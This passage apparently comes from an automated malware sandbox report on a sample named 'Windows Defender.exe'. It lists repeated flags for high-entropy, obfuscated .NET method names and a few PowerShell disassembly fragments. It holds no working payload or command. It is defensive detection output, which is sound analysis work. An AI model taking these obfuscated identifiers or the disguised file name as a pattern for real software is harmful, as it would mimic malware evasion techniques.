                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs.Net Code: elpS3ku2aknXu3fLwtG2LmSWxhZ2tMiKJL0vXJ9OkUrcWY9AKDT2p25B3KlnFKErNlvaEG9ZewnXP
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3456D2A5 pushad ; iretd 2_2_00007FFD3456D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34752316 push 8B485F92h; iretd 2_2_00007FFD3475231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3457D2A5 pushad ; iretd 5_2_00007FFD3457D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3469C2C5 push ebx; iretd 5_2_00007FFD3469C2DA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34762316 push 8B485F91h; iretd 5_2_00007FFD3476231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD3454D2A5 pushad ; iretd 9_2_00007FFD3454D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD34732316 push 8B485F94h; iretd 9_2_00007FFD3473231B
                      Source: Windows Defender.exe, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csHigh entropy of concatenated method names: 'Rute6Q5WfZvWUrj7yB49O777GXEBlczDv32ghc0AuKl7Eq7f8AlSx1K9UCYrTt8Enkzd00PAsgvJ2GaG', 'vqoXLxMurja5P63uVjV19ePPqazR47SDPa4UttMMpdIMsmJvdOHzWCZvJ5ssFQQrrO5l8H1Beh9lbFzh', 'btUmetsTApatkGtIV7Ar85mhuWhty6TScMcbnp4Bc0EWVLzoXJ3MXttQG85E0Mw6r08Bg0gK7F0sIPyW', '_9ilAP0cixqahHu4GEVeQDwOxsqe8x1q8PisWnM9J5eCC4xT42SCNWJE9AfMDBxZUoBnkzXZowCDwicnO'
                      Source: Windows Defender.exe, zkQvGS0CbJWVNQzX5NTER9jKP2wULDi4d7anVMwHXLqxt2Tfv4P79Ovl8LhrrbpRTAHRggLj6diBqOcOOQp4tkjEnPEJC5.csHigh entropy of concatenated method names: 'Cf727bOR7tmg52RUOBjzXXW07BvwwusAZeXWQUbfS5TSAxiVeQ85Di2K7cjskToFklKtP27kh7hRErq6t1aiZtwj317DKD', 'b6Gpmr1a6DLZ0iQe5PQiXjfDgwJTVCs85bzz2miyfWUF6ZRelk5mmW9pV8b6qnqAbqQSpFjHJARDeNsHMmmBH7GM7x1Ilf', 'WWYaGiEOPbQrDeeuEOh96p36J4l3CXXUW6My42JCfgnmJ6ldEdCgyPyaIEYUIAEqZMQw3SqhV3VmScsgVvnifDENPzrzDv', 'KCHtc1PRa2W2WF8Vo67k5A', 'CS2hsHRh3siCbOd6p2HOda', 'dhPyQmjAH02BwSBgb7Jf05', 'WuvOV43onvRsDtNiqMWHAw', 'AS5Nn37UDDwO0zKIdLK7gm', '_8ULcALNWa2tKQ9ZwieNluI', 'SfeiZ7WsOxTSvCI8uMI0Yg'
                      Source: Windows Defender.exe, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'YmUEfhQ1wTKDpAXx46A1o8Y4mpSM8r8oub0Z3xgEFg0lflxzLtSWQERHpbJScMon62EuS6s6DzKpi6Aj', '_8MfTblSGLO5n0mPc2nYdMQazaJLOrXt8NQio3PmBFNSKJNDpmDTjlXe9cJu1ibS9aU6N3niIM31qbgcA', 'zWsNhrmhwGpSQ1GT2yTf9YGIqdLugqch40onIwOyzOpbNEyMsCvbLqqNFzlBLkDJ1Ka7ndeUe0ANFikU', '_4KVsAkI14lbomkIoEVolZ3Zo6TGPNmp4s0gPSV0l7Q69pLOjmMCh9WkVERgOXOnH3ZUsqTnHHwIR4rpf'
                      Source: Windows Defender.exe, OVvRXAYaO1Zt4j8kRspWu8Dluwd0T5ynfiFpuFFu9oL9Wutux2n6Kdfpe6PdXD.csHigh entropy of concatenated method names: 'zcPak2Bsyo8wccw7Uv3aiI37yZoliDHgleuyqwETbHQd9J045tXgkI1qlfitR4', 'LnxexLOzfmbgG7jq6maRN0QA2p2CJP8ZygHiQlLb0ppaU1fT6IN7dd1yiuDkNp', 'gJIgi2FPNaDPC4EwzsGhiY2sPhtac76AsL8impk1XIcnVzR3rnRj2XSflBROJV', '_2O1IobNQiQ8Wc5XwYvjcpyDnrG3KHW0JmvtivyJALruWtIj4LGn1tKeO3USg5x', 'H0llgP1zOdBZtDAtdx1Cxk', 'UqFolkiLKQ4JbhehxP1bzt', '_03EZcOibVWwuyQFiTqnT2s', 'G3MI0QwFp4pni6N39enaXd', 'U4z45H2vtb9BFwqlN6lVxF', 'Q6Jls5twNnDmWl4vgIiSbi'
                      Source: Windows Defender.exe, jx9GZsYLetM8ozl7eeSUYzaQ9rVm6zahKbBJECPrIV9xeRXsM4ZcUAK0g1ype5.csHigh entropy of concatenated method names: 'StyaJjuBncIt9ThkoYTkgJYT4G2PSxngq1OvYXUuUTWkPMCl9dnBCYNLuV56Ae', '_1givnKGlzrQZPv9YZ5KOBN', 'FXCw5u2JpZHzFj705RvUW0', 'ZjqJdWqvnSaB93WE34qu6a', 'wksOBjUK8cAPfmooAuQO2D'
                      Source: Windows Defender.exe, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csHigh entropy of concatenated method names: 'DAd6MY6WE4amuhxrr4rf7HcKOjmPHzihO08yso7tjrHGipjdfQJGte2kNfYt1A', 'EEG2usG8WiBmb3SmuxCcnsQ3osy3y3GDWYkPji0Al1v1JWS0sQRz09IittLfuX', 'QcKEpexPmpox3XOwz4Bl7riUjiPtDwWUxZWYZQtYskm3cKI0ruZMF5g8k670ow', 'WZ7ktBjfrsh68udUUPkZrVhR4WMHREcWaGCfr20GIw65JCQmUgxeG5HrXJmZkf', 'eORZ7fjqhZzG3pzpIn4alL1aoCtIhWEKGQF2JVYzoSGJgi5OzYLKqqSJ1HmMG7', '_553psPh1t5SncNT6ckbKASBJC8uq3fDBHTJIabfU3j1zKoozq4Ci7UzzSCmJtI', 'SyFv2P5XoehdJnT219CeBvc978z1Ho9JrjfROxl1zcFauUtGBjZQ1P8EaFitC0', 'HJO9Xmz1UIQBlQ0JBoV3uUz1irYdtjXjyH0WW2hMdPtDQWgMpG6xP3YF0EoIsD', 'mWcZIDE7MfG3T6MrBrPQiHWeMnLjdXzRv8PqZkTfI3o1E85R1ZFEtHbb8QiUL4', 'hXogqRoM3BqP35AogVfb4qDe4JHRqCjxysRympSYAy0C5Saj7YkhHXjHU0FZYg'
                      Source: Windows Defender.exe, WqBFPPAGdP3qekKnUXbSbMnJQkYEWq6EDn6c9pYZqk7IrAascLDqgnmAgB4ND2.csHigh entropy of concatenated method names: '_2YF2CRCsDxdnPdsPBchoEhwDZKc2AXV8hIOv01TvH6OQlY4T1VOIp7Tkpf2sST', 'izfsM6M5EJ9022yy2GhiMa4Bwnc097KT7AhqxNHBKX7zq8jK6gCmwgw3KdQKda', 'Ux2rE57wFUIxDfwqfnBFCGFSB0GjwBtVP29hwIjLDU1S9quzDBNA22Lay2S0JK', '_43Lx3rAdBh2j4nWOx656HHtCbrZ1PdRnus0reiTUGQoGpicRD8iPa9pXSiZJOc', 'Z13RptwCW6XMeTAkZkkKdm9kNxgi9iKJlLM8IF79bjsu2BhrUZT1siGtlJ4BwO', '_6Q2P9IWxjqddZPGIaZe7mUWnyZmJKvHhjKz91sMVMlcYij9rq4vXtUogf7WrHl', 'X68ePNrQwDbQ8uqQNDHJSitBmeJXe2Q49tAB0TGy72VGUASLGdoz4QZzKHzrgS', '_4VLeHC1i6LkyVH2oQRjg5pHqg89lv7hXZdrnn3ceAR7VmVTgNPZTSsprslXefR', 'nm0e3gZXlCPxo4CZhSxRNAuslaHN5n2q5GASCv78CCyarQHpdJprQ9neptRq0e', 'Vmyuxdcefk6376V9aadd6WNzN74pa5hWPfAoVWk8dTKIrHIFiZGcxW4mxtNlkc'
                      Source: Windows Defender.exe, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.csHigh entropy of concatenated method names: 'JoRZgwYRrib0pzhpbwWuCtzXsDVKwaWx5tO0u2n7d2Cz2N5q28xKD8Fwiqx4STiG0XvtWrH2LhOU1', 'btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac', 'ugnFlO8xTqB6vzX4WBwVisSRqh5O5nGNDs3hF8G8QzWX8KfWJpJ6ZFoFuLNjzXlAL7ehRPDMozBR1', 'b7N61fbBnHn379Cg8KG40J7wXB15pCeuevw12h2z463IzZDO9oFoHQcxWRzgKeg6Sj8hhRpGhSOaK', 'KElHQzROcJDUxi5j7UiI8pcLCBOq32DagRpElG4rBN4kpdWNsJamX8yMLUkIqoTrKuS2oYHzR29fo', 'zJENyi6rDFsfvR2PuqsNpRvB0DB3RMi6deOtdOSMdhaBI7Iwv18yYOQSgB3RrlSmWhJHq0PDGfQem', 'enY8qBECWHWHiOg0sJlf5zeZ6a6HQ7dtubz2ewvOScb8ZuTBjUEMAMVrwY29V6ThmbdmOlKDjip5V', 'ndjhIoTbd7FTL4aAH7NOjBb6yoQNNVPtuVkyYeqawMbmsbxyqaY7WBC8lEQ8sWtPZROnieYwkS8CT', '_7qlab1dNPzWfuJE6nU9nYteKoAIV5Hl3bR2emlAtQmjm4Q33fpzxH7Vob9GFwcoBiQsdKh7FcPx7r', 'om2e3sWjhmFSXj6ueB3p2lrHh3loqJI3Ln3FYvLU8zxsAizAWP1FAwqU5fQLtWJ1Fp4gz7atHLzFy'
                      Source: Windows Defender.exe, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csHigh entropy of concatenated method names: '_36Iu8s60bxeFR4yMJVHnKU3HH5G0XdCkYGRvNxeusm2xRkTCirth7MIl3bEYMLRwcgVbXbYXWzRJj', 'faomJDQTH9JfrQdsdIlJKfaYbhf3qszNtTnzmUj4976tVVM5Y09H9aNvYFx3TnCXKgLYGVS0lMNLU', 'rkDeZ2n9YEpjTXkJxDoMHTqWF5YQd0ylDMfuTpp5s3RqbkwPhJeNuKgSA415fXhpW68YBHy6Ymcge', 'bHYmEjJ7sdLajo2keOL4u3oa4NrZ9hWJZht8YVkxC2ecvLJErDhtjiRJpCyxpalQXR3elrvDqcgLe', 'ln6UL6yiXM4T1Pr6d3btbvrjL9SoiNilXgU9dDYgetX8ow3FRkWwlwOEaLaToOsql87Je9Y4zZPkt', 'dqW1HlDiGOIQY2sX2VquBfHHMmw6Iu3xtqqcvf3AoUZDJwuOrWVbqgy1qwESKzJ2lJZ3aU0tw6J6C', 'no09akK38j3bIvQNA4Wdv7ufwBUbJ93yyNZghYNkS4ACJlXfxQjAzpXfgczhJ5ArkYZ6gwbvXjSNB', 'EBzFOEVL98ZjzRwTm8lKAdFIiSXYqMGmzGaBjdj0VkZIpSt5tG7a3tBb7LUAIMT7ainpEqxxZMwJ0', '_6EjaJhzY4Gaveg0ui8NYtJg97g738DxWHUEsjKOSVPIJNkk7ze8aJ00bLYqNIMYIkiaqs2WYsOwPU', '_5bUJBXaOgvlMv64mzSubcFb8PqbAGAT8inlazolutMv5ocpXlyla3VzKWXSfp1pZCpEzynoqnlhjb'
                      Source: Windows Defender.exe, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csHigh entropy of concatenated method names: 'WwjisSxxDCIbYcd4Y4UsqmXSlLzy6oLoIqOCTMWAInrkF', 'bBheXXcZoHVHxH3bBwr4aiknrJ30F2bql9MOkfWOgWaTq', 'Zdz9Y1bCXi8V72fSYkM8d7sniuRdX542x8pAEt3CeMF9j', 'yXMXIg1VptpW8byLQs5HSkP1TA0h1hAEQiHbQSes2bmcp', 'I2YmHmS08pAbFmzOSBH8Y9cTmI9CWatYj4soluOsJsGYz', 'LVuZSiiDv5SFtOV7OLqTzSGpKYqkYtH4XZd8ll22xBt6P', 'D6tgcK1HEP2IGjUVuhog1CaWcVSXFyYs8oDUuBWgoKCPK', '_32gxo0e19sbzb3vOpQ77zPrQGLg0R87ydpGd041Mfbvm8', 'WZylfD2CEeMMaIvgBNUQv7gc2RbHrrLbHNWRRmPYb6aSw', 'lZyYSscCiEU4lOIVItSVV7ZuAnLoEt96sL8470xdo95Jf'
                      Source: Windows Defender.exe, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csHigh entropy of concatenated method names: 'uAIdma4NR8QqGZMhHTp2pkwIUASRT1s5TCCMoALNGGqZUcAQgjPmEfsnMYfpcU', 'E8guj0wkTXSDi5PFQB7VFk', '_2BlW37vOQ5lBjwqupApYeu', 'O3m6VbhYCCdK6SVfSdZECU', '_46xAuc1Pk0nvKAyw2iwSns'
                      Source: Windows Defender.exe.0.dr, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csHigh entropy of concatenated method names: 'Rute6Q5WfZvWUrj7yB49O777GXEBlczDv32ghc0AuKl7Eq7f8AlSx1K9UCYrTt8Enkzd00PAsgvJ2GaG', 'vqoXLxMurja5P63uVjV19ePPqazR47SDPa4UttMMpdIMsmJvdOHzWCZvJ5ssFQQrrO5l8H1Beh9lbFzh', 'btUmetsTApatkGtIV7Ar85mhuWhty6TScMcbnp4Bc0EWVLzoXJ3MXttQG85E0Mw6r08Bg0gK7F0sIPyW', '_9ilAP0cixqahHu4GEVeQDwOxsqe8x1q8PisWnM9J5eCC4xT42SCNWJE9AfMDBxZUoBnkzXZowCDwicnO'
                      Source: Windows Defender.exe.0.dr, zkQvGS0CbJWVNQzX5NTER9jKP2wULDi4d7anVMwHXLqxt2Tfv4P79Ovl8LhrrbpRTAHRggLj6diBqOcOOQp4tkjEnPEJC5.csHigh entropy of concatenated method names: 'Cf727bOR7tmg52RUOBjzXXW07BvwwusAZeXWQUbfS5TSAxiVeQ85Di2K7cjskToFklKtP27kh7hRErq6t1aiZtwj317DKD', 'b6Gpmr1a6DLZ0iQe5PQiXjfDgwJTVCs85bzz2miyfWUF6ZRelk5mmW9pV8b6qnqAbqQSpFjHJARDeNsHMmmBH7GM7x1Ilf', 'WWYaGiEOPbQrDeeuEOh96p36J4l3CXXUW6My42JCfgnmJ6ldEdCgyPyaIEYUIAEqZMQw3SqhV3VmScsgVvnifDENPzrzDv', 'KCHtc1PRa2W2WF8Vo67k5A', 'CS2hsHRh3siCbOd6p2HOda', 'dhPyQmjAH02BwSBgb7Jf05', 'WuvOV43onvRsDtNiqMWHAw', 'AS5Nn37UDDwO0zKIdLK7gm', '_8ULcALNWa2tKQ9ZwieNluI', 'SfeiZ7WsOxTSvCI8uMI0Yg'
                      Source: Windows Defender.exe.0.dr, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'YmUEfhQ1wTKDpAXx46A1o8Y4mpSM8r8oub0Z3xgEFg0lflxzLtSWQERHpbJScMon62EuS6s6DzKpi6Aj', '_8MfTblSGLO5n0mPc2nYdMQazaJLOrXt8NQio3PmBFNSKJNDpmDTjlXe9cJu1ibS9aU6N3niIM31qbgcA', 'zWsNhrmhwGpSQ1GT2yTf9YGIqdLugqch40onIwOyzOpbNEyMsCvbLqqNFzlBLkDJ1Ka7ndeUe0ANFikU', '_4KVsAkI14lbomkIoEVolZ3Zo6TGPNmp4s0gPSV0l7Q69pLOjmMCh9WkVERgOXOnH3ZUsqTnHHwIR4rpf'
                      Source: Windows Defender.exe.0.dr, OVvRXAYaO1Zt4j8kRspWu8Dluwd0T5ynfiFpuFFu9oL9Wutux2n6Kdfpe6PdXD.csHigh entropy of concatenated method names: 'zcPak2Bsyo8wccw7Uv3aiI37yZoliDHgleuyqwETbHQd9J045tXgkI1qlfitR4', 'LnxexLOzfmbgG7jq6maRN0QA2p2CJP8ZygHiQlLb0ppaU1fT6IN7dd1yiuDkNp', 'gJIgi2FPNaDPC4EwzsGhiY2sPhtac76AsL8impk1XIcnVzR3rnRj2XSflBROJV', '_2O1IobNQiQ8Wc5XwYvjcpyDnrG3KHW0JmvtivyJALruWtIj4LGn1tKeO3USg5x', 'H0llgP1zOdBZtDAtdx1Cxk', 'UqFolkiLKQ4JbhehxP1bzt', '_03EZcOibVWwuyQFiTqnT2s', 'G3MI0QwFp4pni6N39enaXd', 'U4z45H2vtb9BFwqlN6lVxF', 'Q6Jls5twNnDmWl4vgIiSbi'
                      Source: Windows Defender.exe.0.dr, jx9GZsYLetM8ozl7eeSUYzaQ9rVm6zahKbBJECPrIV9xeRXsM4ZcUAK0g1ype5.csHigh entropy of concatenated method names: 'StyaJjuBncIt9ThkoYTkgJYT4G2PSxngq1OvYXUuUTWkPMCl9dnBCYNLuV56Ae', '_1givnKGlzrQZPv9YZ5KOBN', 'FXCw5u2JpZHzFj705RvUW0', 'ZjqJdWqvnSaB93WE34qu6a', 'wksOBjUK8cAPfmooAuQO2D'
                      Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csHigh entropy of concatenated method names: 'DAd6MY6WE4amuhxrr4rf7HcKOjmPHzihO08yso7tjrHGipjdfQJGte2kNfYt1A', 'EEG2usG8WiBmb3SmuxCcnsQ3osy3y3GDWYkPji0Al1v1JWS0sQRz09IittLfuX', 'QcKEpexPmpox3XOwz4Bl7riUjiPtDwWUxZWYZQtYskm3cKI0ruZMF5g8k670ow', 'WZ7ktBjfrsh68udUUPkZrVhR4WMHREcWaGCfr20GIw65JCQmUgxeG5HrXJmZkf', 'eORZ7fjqhZzG3pzpIn4alL1aoCtIhWEKGQF2JVYzoSGJgi5OzYLKqqSJ1HmMG7', '_553psPh1t5SncNT6ckbKASBJC8uq3fDBHTJIabfU3j1zKoozq4Ci7UzzSCmJtI', 'SyFv2P5XoehdJnT219CeBvc978z1Ho9JrjfROxl1zcFauUtGBjZQ1P8EaFitC0', 'HJO9Xmz1UIQBlQ0JBoV3uUz1irYdtjXjyH0WW2hMdPtDQWgMpG6xP3YF0EoIsD', 'mWcZIDE7MfG3T6MrBrPQiHWeMnLjdXzRv8PqZkTfI3o1E85R1ZFEtHbb8QiUL4', 'hXogqRoM3BqP35AogVfb4qDe4JHRqCjxysRympSYAy0C5Saj7YkhHXjHU0FZYg'
                      Source: Windows Defender.exe.0.dr, WqBFPPAGdP3qekKnUXbSbMnJQkYEWq6EDn6c9pYZqk7IrAascLDqgnmAgB4ND2.csHigh entropy of concatenated method names: '_2YF2CRCsDxdnPdsPBchoEhwDZKc2AXV8hIOv01TvH6OQlY4T1VOIp7Tkpf2sST', 'izfsM6M5EJ9022yy2GhiMa4Bwnc097KT7AhqxNHBKX7zq8jK6gCmwgw3KdQKda', 'Ux2rE57wFUIxDfwqfnBFCGFSB0GjwBtVP29hwIjLDU1S9quzDBNA22Lay2S0JK', '_43Lx3rAdBh2j4nWOx656HHtCbrZ1PdRnus0reiTUGQoGpicRD8iPa9pXSiZJOc', 'Z13RptwCW6XMeTAkZkkKdm9kNxgi9iKJlLM8IF79bjsu2BhrUZT1siGtlJ4BwO', '_6Q2P9IWxjqddZPGIaZe7mUWnyZmJKvHhjKz91sMVMlcYij9rq4vXtUogf7WrHl', 'X68ePNrQwDbQ8uqQNDHJSitBmeJXe2Q49tAB0TGy72VGUASLGdoz4QZzKHzrgS', '_4VLeHC1i6LkyVH2oQRjg5pHqg89lv7hXZdrnn3ceAR7VmVTgNPZTSsprslXefR', 'nm0e3gZXlCPxo4CZhSxRNAuslaHN5n2q5GASCv78CCyarQHpdJprQ9neptRq0e', 'Vmyuxdcefk6376V9aadd6WNzN74pa5hWPfAoVWk8dTKIrHIFiZGcxW4mxtNlkc'
                      Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.csHigh entropy of concatenated method names: 'JoRZgwYRrib0pzhpbwWuCtzXsDVKwaWx5tO0u2n7d2Cz2N5q28xKD8Fwiqx4STiG0XvtWrH2LhOU1', 'btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac', 'ugnFlO8xTqB6vzX4WBwVisSRqh5O5nGNDs3hF8G8QzWX8KfWJpJ6ZFoFuLNjzXlAL7ehRPDMozBR1', 'b7N61fbBnHn379Cg8KG40J7wXB15pCeuevw12h2z463IzZDO9oFoHQcxWRzgKeg6Sj8hhRpGhSOaK', 'KElHQzROcJDUxi5j7UiI8pcLCBOq32DagRpElG4rBN4kpdWNsJamX8yMLUkIqoTrKuS2oYHzR29fo', 'zJENyi6rDFsfvR2PuqsNpRvB0DB3RMi6deOtdOSMdhaBI7Iwv18yYOQSgB3RrlSmWhJHq0PDGfQem', 'enY8qBECWHWHiOg0sJlf5zeZ6a6HQ7dtubz2ewvOScb8ZuTBjUEMAMVrwY29V6ThmbdmOlKDjip5V', 'ndjhIoTbd7FTL4aAH7NOjBb6yoQNNVPtuVkyYeqawMbmsbxyqaY7WBC8lEQ8sWtPZROnieYwkS8CT', '_7qlab1dNPzWfuJE6nU9nYteKoAIV5Hl3bR2emlAtQmjm4Q33fpzxH7Vob9GFwcoBiQsdKh7FcPx7r', 'om2e3sWjhmFSXj6ueB3p2lrHh3loqJI3Ln3FYvLU8zxsAizAWP1FAwqU5fQLtWJ1Fp4gz7atHLzFy'
                      Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csHigh entropy of concatenated method names: '_36Iu8s60bxeFR4yMJVHnKU3HH5G0XdCkYGRvNxeusm2xRkTCirth7MIl3bEYMLRwcgVbXbYXWzRJj', 'faomJDQTH9JfrQdsdIlJKfaYbhf3qszNtTnzmUj4976tVVM5Y09H9aNvYFx3TnCXKgLYGVS0lMNLU', 'rkDeZ2n9YEpjTXkJxDoMHTqWF5YQd0ylDMfuTpp5s3RqbkwPhJeNuKgSA415fXhpW68YBHy6Ymcge', 'bHYmEjJ7sdLajo2keOL4u3oa4NrZ9hWJZht8YVkxC2ecvLJErDhtjiRJpCyxpalQXR3elrvDqcgLe', 'ln6UL6yiXM4T1Pr6d3btbvrjL9SoiNilXgU9dDYgetX8ow3FRkWwlwOEaLaToOsql87Je9Y4zZPkt', 'dqW1HlDiGOIQY2sX2VquBfHHMmw6Iu3xtqqcvf3AoUZDJwuOrWVbqgy1qwESKzJ2lJZ3aU0tw6J6C', 'no09akK38j3bIvQNA4Wdv7ufwBUbJ93yyNZghYNkS4ACJlXfxQjAzpXfgczhJ5ArkYZ6gwbvXjSNB', 'EBzFOEVL98ZjzRwTm8lKAdFIiSXYqMGmzGaBjdj0VkZIpSt5tG7a3tBb7LUAIMT7ainpEqxxZMwJ0', '_6EjaJhzY4Gaveg0ui8NYtJg97g738DxWHUEsjKOSVPIJNkk7ze8aJ00bLYqNIMYIkiaqs2WYsOwPU', '_5bUJBXaOgvlMv64mzSubcFb8PqbAGAT8inlazolutMv5ocpXlyla3VzKWXSfp1pZCpEzynoqnlhjb'
                      Source: Windows Defender.exe.0.dr, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csHigh entropy of concatenated method names: 'WwjisSxxDCIbYcd4Y4UsqmXSlLzy6oLoIqOCTMWAInrkF', 'bBheXXcZoHVHxH3bBwr4aiknrJ30F2bql9MOkfWOgWaTq', 'Zdz9Y1bCXi8V72fSYkM8d7sniuRdX542x8pAEt3CeMF9j', 'yXMXIg1VptpW8byLQs5HSkP1TA0h1hAEQiHbQSes2bmcp', 'I2YmHmS08pAbFmzOSBH8Y9cTmI9CWatYj4soluOsJsGYz', 'LVuZSiiDv5SFtOV7OLqTzSGpKYqkYtH4XZd8ll22xBt6P', 'D6tgcK1HEP2IGjUVuhog1CaWcVSXFyYs8oDUuBWgoKCPK', '_32gxo0e19sbzb3vOpQ77zPrQGLg0R87ydpGd041Mfbvm8', 'WZylfD2CEeMMaIvgBNUQv7gc2RbHrrLbHNWRRmPYb6aSw', 'lZyYSscCiEU4lOIVItSVV7ZuAnLoEt96sL8470xdo95Jf'
                      Source: Windows Defender.exe.0.dr, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csHigh entropy of concatenated method names: 'uAIdma4NR8QqGZMhHTp2pkwIUASRT1s5TCCMoALNGGqZUcAQgjPmEfsnMYfpcU', 'E8guj0wkTXSDi5PFQB7VFk', '_2BlW37vOQ5lBjwqupApYeu', 'O3m6VbhYCCdK6SVfSdZECU', '_46xAuc1Pk0nvKAyw2iwSns'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csHigh entropy of concatenated method names: 'Rute6Q5WfZvWUrj7yB49O777GXEBlczDv32ghc0AuKl7Eq7f8AlSx1K9UCYrTt8Enkzd00PAsgvJ2GaG', 'vqoXLxMurja5P63uVjV19ePPqazR47SDPa4UttMMpdIMsmJvdOHzWCZvJ5ssFQQrrO5l8H1Beh9lbFzh', 'btUmetsTApatkGtIV7Ar85mhuWhty6TScMcbnp4Bc0EWVLzoXJ3MXttQG85E0Mw6r08Bg0gK7F0sIPyW', '_9ilAP0cixqahHu4GEVeQDwOxsqe8x1q8PisWnM9J5eCC4xT42SCNWJE9AfMDBxZUoBnkzXZowCDwicnO'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, zkQvGS0CbJWVNQzX5NTER9jKP2wULDi4d7anVMwHXLqxt2Tfv4P79Ovl8LhrrbpRTAHRggLj6diBqOcOOQp4tkjEnPEJC5.csHigh entropy of concatenated method names: 'Cf727bOR7tmg52RUOBjzXXW07BvwwusAZeXWQUbfS5TSAxiVeQ85Di2K7cjskToFklKtP27kh7hRErq6t1aiZtwj317DKD', 'b6Gpmr1a6DLZ0iQe5PQiXjfDgwJTVCs85bzz2miyfWUF6ZRelk5mmW9pV8b6qnqAbqQSpFjHJARDeNsHMmmBH7GM7x1Ilf', 'WWYaGiEOPbQrDeeuEOh96p36J4l3CXXUW6My42JCfgnmJ6ldEdCgyPyaIEYUIAEqZMQw3SqhV3VmScsgVvnifDENPzrzDv', 'KCHtc1PRa2W2WF8Vo67k5A', 'CS2hsHRh3siCbOd6p2HOda', 'dhPyQmjAH02BwSBgb7Jf05', 'WuvOV43onvRsDtNiqMWHAw', 'AS5Nn37UDDwO0zKIdLK7gm', '_8ULcALNWa2tKQ9ZwieNluI', 'SfeiZ7WsOxTSvCI8uMI0Yg'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'YmUEfhQ1wTKDpAXx46A1o8Y4mpSM8r8oub0Z3xgEFg0lflxzLtSWQERHpbJScMon62EuS6s6DzKpi6Aj', '_8MfTblSGLO5n0mPc2nYdMQazaJLOrXt8NQio3PmBFNSKJNDpmDTjlXe9cJu1ibS9aU6N3niIM31qbgcA', 'zWsNhrmhwGpSQ1GT2yTf9YGIqdLugqch40onIwOyzOpbNEyMsCvbLqqNFzlBLkDJ1Ka7ndeUe0ANFikU', '_4KVsAkI14lbomkIoEVolZ3Zo6TGPNmp4s0gPSV0l7Q69pLOjmMCh9WkVERgOXOnH3ZUsqTnHHwIR4rpf'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, OVvRXAYaO1Zt4j8kRspWu8Dluwd0T5ynfiFpuFFu9oL9Wutux2n6Kdfpe6PdXD.csHigh entropy of concatenated method names: 'zcPak2Bsyo8wccw7Uv3aiI37yZoliDHgleuyqwETbHQd9J045tXgkI1qlfitR4', 'LnxexLOzfmbgG7jq6maRN0QA2p2CJP8ZygHiQlLb0ppaU1fT6IN7dd1yiuDkNp', 'gJIgi2FPNaDPC4EwzsGhiY2sPhtac76AsL8impk1XIcnVzR3rnRj2XSflBROJV', '_2O1IobNQiQ8Wc5XwYvjcpyDnrG3KHW0JmvtivyJALruWtIj4LGn1tKeO3USg5x', 'H0llgP1zOdBZtDAtdx1Cxk', 'UqFolkiLKQ4JbhehxP1bzt', '_03EZcOibVWwuyQFiTqnT2s', 'G3MI0QwFp4pni6N39enaXd', 'U4z45H2vtb9BFwqlN6lVxF', 'Q6Jls5twNnDmWl4vgIiSbi'
